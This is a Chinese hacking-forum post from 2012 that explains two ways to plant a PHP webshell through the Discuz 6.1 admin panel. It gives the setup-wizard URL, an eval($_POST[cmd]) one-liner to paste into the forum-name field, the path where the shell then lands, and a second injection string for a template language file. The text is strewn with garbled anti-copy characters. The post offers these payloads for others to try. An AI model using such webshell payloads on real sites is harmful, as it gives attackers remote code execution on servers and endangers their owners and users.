找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2367|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell7 k& \/ U# x. M/ g7 M" l
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下4 H" B9 \( B7 T+ o$ S% G
1:& h  v( I( |4 J9 Y; @
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
! {4 U! y- q. ~5 g; f. F8 C/ gadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell4 F' z: D; a9 g0 }- `5 K
<?php eval($_POST[cmd]);?>  h/ `8 }- x" Z$ X& M# n+ O5 Y* C
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
& ]! k, W! I; E) W& G4 V: q+ S& t0 F8 w
( \( r0 G0 h8 ?3 \; I; z! S
2:后台模板管理--默认模板套系--详情& g/ `" f: e7 t' b5 ?, y0 {
templates/default/actions.lang.php
% j7 D2 K- R$ J, q( g+ z! ujhackj\\');eval($_POST[cmd])?>;//
) W& y9 v$ p$ A# }5 @
; S* v1 H9 Y* w5 G利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表